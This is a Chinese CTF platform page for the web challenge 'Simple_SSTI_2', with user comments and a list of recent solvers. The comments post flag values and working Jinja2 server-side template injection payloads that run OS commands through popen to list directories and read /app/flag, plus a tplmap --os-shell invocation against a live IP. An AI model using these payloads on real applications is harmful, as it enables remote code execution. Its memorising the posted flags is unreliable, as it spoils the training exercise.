Simple_SSTI_2WEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Tokeii
一血奖励: 3金币
解  决: 14644
提  示:
描  述:
Simple_SSTI_2
评论
zhuzhu90 1年前

flag{8e89d8c2793a6fec303fb2c62ff71d39}

回复 0

梦若浮生 1年前

http://114.67.175.224:17803/?flag={{lipsum.__globals__.os.popen('cat /app/flag').read()}}

回复 0

dodobird 1年前

flag{868be7e5edab8f71e023a1e642e7aad2}

回复 0

L_ergo 1年前

flag{968946be81a675c24c0bef227383ba70}

回复 0

shansang 1年前

python3 ./tplmap.py -u http://114.67.175.224:13633/?flag --engine=Jinja2 --os-shell

回复 0

热热热热热若 1年前

flag{23de1e599ad6abcc6c446e355e72c807}

回复 0

starrabbit 1年前

也可通过tplmap工具直接获取权限

回复 1

hxl223 1年前

flag{23de1e599ad6abcc6c446e355e72c807}

回复 1

nepw 1年前

通过{{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}读取系统文件 通过{{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}读取读取app目录下的文件,发现存在flag文件 通过{{ config.__c

回复 1

DK2021 1年前

/?flag={{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}

回复 1

WriteUp

image
valecalida

5 金币

评分(14)

解题动态

X9527C 攻破了该题 5小时前
llljiachen 攻破了该题 7小时前
lxqfun 攻破了该题 8小时前
lotusibm 攻破了该题 9小时前
CY0704 攻破了该题 1天前
谪云纤仙 攻破了该题 1天前
niuyichen 攻破了该题 2天前
群众里有坏人 攻破了该题 2天前
2849476730 攻破了该题 3天前
wanan9 攻破了该题 3天前
17866543127 攻破了该题 3天前
13858875884 攻破了该题 3天前
Li11111 攻破了该题 3天前
coolsword2023 攻破了该题 3天前
Spirita 攻破了该题 3天前
ZhouShaoyang 攻破了该题 4天前
18476760376 攻破了该题 4天前
laksdj 攻破了该题 4天前
1275178332 攻破了该题 4天前
18358870681 攻破了该题 5天前